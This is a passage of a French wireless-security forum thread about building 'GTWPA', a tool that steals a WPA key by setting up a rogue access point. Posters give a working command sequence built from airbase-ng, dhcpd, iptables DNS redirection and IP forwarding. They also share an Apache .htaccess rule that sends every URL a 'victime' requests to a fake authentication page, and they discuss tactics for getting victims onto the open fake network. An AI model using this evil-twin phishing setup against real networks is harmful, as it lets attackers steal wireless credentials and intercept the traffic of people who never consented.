Hors Ligne

#121 30-09-2010 22:28:51

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Bon je viens de faire d'autre tests donc voila ce qui marche le mieux:

airbase-ng -P -C 30 -e réseau -v mon0
suide:

ifconfig mon0 up
ifconfig mon0 10.0.0.1 netmask 255.255.255.0
ifconfig mon0 mtu 1400
cd /
cd etc
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo > dhcpd.leases
killall dhcpd
dhcpd -cf dhcpd.conf -lf dhcpd.leases mon0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1 
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE 
iptables --append FORWARD --in-interface mon0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
/etc/init.d/dhcp3-server restart

Le client se connecte et peux surfer sur le web(a condition qu'il clique de lui meme)

Maintenant on a cette commande qui et pas mal aussi:

airbase-ng -c CANAL -e RÉSEAU -a BSSID mon0

Seulement la il duplique le réseau en wpa et en plus crée un faux réseau en open,le pc sous win cherche a se connecter sur le faux réseau en wpa mais ne peux pas(en configurant bien c'est possible pour un mitm mais c'est pas le sujet).
Il tente tout le temps de se connecter sans y pouvoir.

Au bout d'un moment(enfin je pense)la personne va en avoir marre et regarder ses réseaux sans fil et verra son réseau en open et on retourne au point de depart c'est a dire qu'il clique dessus pour s'y connecter...

En attendant je trouve qu'en tapant la 2e commande airbase la connexion se fait plus rapidement et je pense que sa c'est important si on ne veut pas que le client se deconecte car il en a marre d'attendre que la page se charge...

Note: j'ai galéré pour la connexion sur mon AP réel avec mon pc victime après avoir fait la rogue avec la 2e commande d'airbase.

Hors Ligne

#122 30-09-2010 22:31:52

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

A oui mon0 et a remplacer par at0 désolé de l'erreur roll

Hors Ligne

#123 04-10-2010 23:34:46

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Je ne sais pas si ça vous le fait aussi :

- Je lance l'attaque, tout fonctionne et quand, sur mon PC_Victime, je saisit une adresse genre www.duboudin.com ou encore www.duboudin.com/ ça fonctionne, je suis bien dirigé vers la FAKE PAGE lancée par apache2 sur mon BT4.

Seulement quand je demande à accéder à www.duboudin.com/lol/x.html ... tout de suite, je tombe sur une belle erreur 404 alors que je voudrais que ma Fake AP redirige cette page aussi vers la Fake page ...

J'comprends pas trop smile


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

#124 05-10-2010 19:01:16

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Je pense que dnsspoof ne spoof que le nom de domaine et non le repertoire auquel on veut avoir l'accès ...

Regarde dans ce tuto, la solution qu'il propose devrait marcher wink

Dernière modification par Squaks (05-10-2010 23:04:46)


Sharkoff

Hors Ligne

#125 05-10-2010 19:31:18

Carto_
Membre V.I.P.
Inscription : 16-01-2010
Messages : 206

Re : GTWPA: notre projet d'outil de récupération de clé WPA via rogue AP

Squaks, c'est parfait !

Solution:

- créer dans /var/www un fichier htaccess.txt ou vous mettrez : ErrorDocument 404 /index.html
- Renommer en .htaccess (il va disparaître, normal, vous ne voyez pas les fichiers cachés (sauf si configuré pour)
- l'index.html étant votre Fake Page (ou index.php ça dépend).

Comme ça, quelque soit la page demandée par le client/victime : POUF, il retombe sur votre page d'authentification
(Fonctionne avec apache2).

Je rajoute dans le script l'automatisation de la création du .htaccess dans /var/www


--
Regarde au-delà de ce que tu vois
--

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2110 28-11-2016 19:42:10 par koala
35 1724 23-11-2016 16:31:33 par roofnat
16 1033 17-11-2016 12:22:00 par disquette
10 416 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 444 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.058 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]